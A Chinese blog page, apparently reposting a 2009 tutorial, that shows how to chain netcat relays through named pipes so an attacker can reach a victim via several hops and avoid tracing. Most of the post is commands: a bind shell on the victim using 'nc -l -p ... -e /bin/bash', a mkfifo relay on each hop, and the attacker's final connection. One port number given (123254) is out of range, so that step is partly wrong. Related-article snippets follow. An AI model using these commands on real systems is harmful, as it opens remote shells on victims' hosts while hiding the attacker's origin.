用netcat实现中继攻击

最新推荐文章于 2024-07-13 21:34:41 发布
最新推荐文章于 2024-07-13 21:34:41 发布
阅读量100 收藏
点赞数
文章标签: 数据结构与算法
原文链接:http://www.cnblogs.com/starspace/archive/2009/02/10/1387532.html
版权

netcat relay 的应用。

攻击者 -> 中继1 -> 中继2 -> 中继3 -> …… -> 受害者
5 1 2 3 …… 254 【假设都在子网192.168.0内】

黑客利用n个跳板来完成攻击,而这n个跳板分布在世界不同的国家,试问,你如何追踪他?
当然我不是为了教大家都去攻击别人,我的目的是让大家深入了解netcat这个瑞士军刀.说实在的,最初我并没有怎么觉得netcat又什么了不起,
可是愈来愈觉得它的强大,尤其是和别的工具综合使用时.好了,介绍一下图中的情景:

攻击者从192.168.0.5 输入控制命令,经过中继1传到中继2,由中继2传到中继3……,最后到达目标机.

@stake 公司的netcat没有中继的功能,但是我们可以使用unix的命名管道.
命名管道是一种先进先出(FIFO)的数据结构,它允许两个进程通过管道联接实现信息交换。命令为 mkfifo pipe_name ,如果没有这个命令,
可以使用 mknod pipe_name p

下面说一下实现过程:
1.受害主机上 nc -l -p 123254 -e /bin/bash

2.中继3上 mkfifo /tmp/backpipe
nc -l -p 1233 0 </tmp/backpipe|nc 192.168.0.254 123254 1 >/tmp/backpipe

3.中继2上 mkfifo /tmp/backpipe
nc -l -p 1232 0 </tmp/backpipe|nc 192.168.0.3 1233 1 >/tmp/backpipe

4.中继1上 mkfifo /tmp/backpipe
nc -l -p 1231 0 </tmp/backpipe|nc 192.168.0.2 1232 1 >/tmp/backpipe

5.攻击者 nc 192.168.0.1 1231

这样你就能实现多级跳了

如果你使用的是GNU的netcat就好办多了, nc -L relay_address:relay_port -p 1234 ,就可以实现在1234端口监听,并把数据转发到relay_host的relay_port端口了,如此easy,不是吗?
  

转载于:https://www.cnblogs.com/starspace/archive/2009/02/10/1387532.html

weixin_30293135
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
僵尸网络之如何防护DDoS攻击,愿这个世界再无黑产
HBohan的博客
11-22 3810
*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 大家好,最近看到国外有一篇和僵尸网络有关的文章,今天分享给各位。 当然,我们面对DDoS当然是可以防御的,就比如云清洗。我写这篇文章的目的是为了让大家更多的去了解如何防护DDoS攻击,所以请勿用作违法行为!愿这个世界再无黑产。 学习网络安全的朋友可以点击【网络安全学习资料·攻略】查看学习思路,也可以私信我获取网络安全相关书籍、工具、教程 简单的 C&C 僵尸网络 这个 hackpack 将引导您完成一个基本框架,该框架从根本上表征了僵尸
攻击防范六(整理)
热门推荐
民兵的家园
06-20 2万+
八种扫描器说明八种扫描器说明⑴NSS(网络安全扫描器) NSS由Perl语言编成,它最根本的价值在于它的速度,它运行速度非常快,它可以执行下列常规检查: ■Sendmail ■匿名FTP ■NFS出口 ■TFTP ■Hosts.equiv ■Xhost 注:除非你拥有最高特权,否则NSS不允许你执行Hosts.equiv。 利用NSS,用户可以增加更强大的功能,其中包括: ■AppleTalk扫描
使用Netcat进行攻击
weixin_34252686的博客
01-08 460
https://www.freebuf.com/column/135007.html 在网上找到了一个开启了ftp服务的服务: http://static.vhdong.com/Upload/Templates/ 扫描了一下 是21端口 121.41.89.5 但是ftp的匿名访问并没有开启吧, 连不上的 root@kali:/home/test# ping sta...
nc (NetCat) 网络安全工具介绍
cavalier的学习之路
05-04 9216
搞系统安全的人,可能没人没听说过大名鼎鼎的nc吧,它可以代替telnet,可以启监听程序,可以用来传输文件,可以用来作为黑客辅助程序,深受大量hacker的喜爱,其功能有如瑞士军刀般好用。 NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end)工具,能被其它的程序程序或脚本直接地或容易地驱动
netcat使用指南
Hello_Ken的专栏
07-25 909
netcat可以作为类似于telent的客户端,也可以监听某个端口作为服务器,还可以作为扫描工具扫描对方主机的端口,还可以用来传输文件。 首先我们要弄明白netcat的工作原理,其实netcat的原理很简单,它就是从网络的一端读入数据,然后输出到网络的另一端,它可以使用tcp和udp协议.之所以叫做netcat,因为它是网络上的cat,想象一下cat的功能,读出一个文件的内容,然后输出到屏幕
常用网络攻击软件
FreshMan
09-08 5313
AirSnort:一种获取加密密码的无线局域网络工具。当收集到足够的数据包时,其会通过被动式地监控数据传输处理加密密码开始运作。采用有线对等协议(WEP)的802.11b会因为出现数量巨大的安全漏洞而瘫痪。(http://airsnort.shmoo.com)   BiDiBlah:作为一种工具,其可以使许多攻击过程,协调侦察的不同方面,扫描和私自利用自动生成一个自动化、点击式的工具。(ht
window系统netcat压缩包
01-20
window系统netcat压缩包
Netcat源码分析和ppt
01-04
Netcat源码分析带中文注释以及Netcat详细分析的ppt ppt内容包含nc的使用方式,nc原理,nc代码结构的拆解以及明文传输的应对方法等
netcat详解
12-16
nc这里指NetCat,它在网络工具中有“瑞士军刀”美誉,而文档讲的就是这个的一些介绍和使用
使用netcat(瑞士军刀)进行文件传输
09-15
netcat是开源世界的经典应用之一,被称为网络瑞士军刀。几乎所有的发行版都会带这个小程序,用它可以在任意两台有网络链接的机器上传输文件, 下面我们就来简单看下他的使用方法吧。
netcat-cygwin.patch
04-16
netcat用于cygwin的patch
7.10飞书一面面经
东篱君的博客
07-10 1235
B+树的⾮叶⼦节点不存放实际的记录数据,仅存放索引,所以数据量相同的情况下,相⽐存储即存索引⼜存记录的 B 树,B+树的⾮叶⼦节点可以存放更多的索引,因此 B+ 树可以⽐ B 树更「矮胖」,查询底层节点的磁盘 I/O次数会更少。主从复制:单节点Redis的并发能力是有上限的,要进一步提高Redis的并发能力,可以搭建主从集群,实现读写分离。B+ 树有⼤量的冗余节点(所有⾮叶⼦节点都是冗余索引),这些冗余索引让 B+ 树在插⼊、删除的效率都更⾼,⽐如删除根节点的时候,不会像 B 树那样会发⽣复杂的树的变化;
Redis数据结构-String篇
时间如瑾 代码如诗
07-12 905
对⼀个内部表示成long型的string执行append, setbit, getrange这些命令,针对的仍然是string的值(即⼗进制表示的字符串),而不是针对内部表⽰的long型进⾏操作。因此,在这些命令的实现中,会把long型先转成字符串再进行相应的操作。String 的内部存储结构⼀般是 sds(Simple Dynamic String,可以动态扩展内存),但是如果⼀个String 类型的 value 的值是数字,那么 Redis 内部会把它转成 long 类型来存储,从⽽减少内存的使用。
单链表面试题---移除链表元素和翻转链表
2302_80826557的博客
07-11 439
分别定义两个指针,分别为cur和prev,让cur=head.next,让prev=head。如下图cur指针是用来确定该节点的数据是否为要删除的数据,如果cur指向的节点的数据为要删除的数据,则我们让prev.next=cur.next,然后再让cur=cur.next。如果cur指向的节点中的数据不是要删除的,则让prev=cur,cur=cur.next。过程图假设11是我们要删除的数据,则观察图,看到cur指向的数据为11,则执行。
第三十七天 第九章 动态规划 part05 完全背包 518. 零钱兑换 II 377. 组合总和 Ⅳ 70. 爬楼梯 (进阶)
m0_69189584的博客
07-13 633
理解什么是完全背包。
sklearn基础教程:掌握机器学习入门的钥匙
最新发布
AIGC绘图领域探索者,热衷于将创意与技术融合,致力于分享前沿AI绘图技巧与心得,让我们一起开启视觉艺术的新篇章。
07-13 891
是基于Python的一个开源机器学习库,它建立在NumPy、SciPy和matplotlib之上,提供了大量的算法和工具,用于数据挖掘和数据分析。无论是简单的线性回归,还是复杂的神经网络,sklearn都能提供直观易用的接口。作为Python中最为流行的机器学习库之一,以其简洁的API、丰富的算法和强大的功能赢得了广大用户的青睐。通过本文的介绍,相信你已经对sklearn有了初步的了解,并能够开始进行一些基础的机器学习任务。
使用python实现netcat
03-28
以下是Python实现Netcat的样例代码: ```python import argparse import socket import threading import subprocess def send_recv(sock): while True: data = sock.recv(1024) if not data: break sock....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值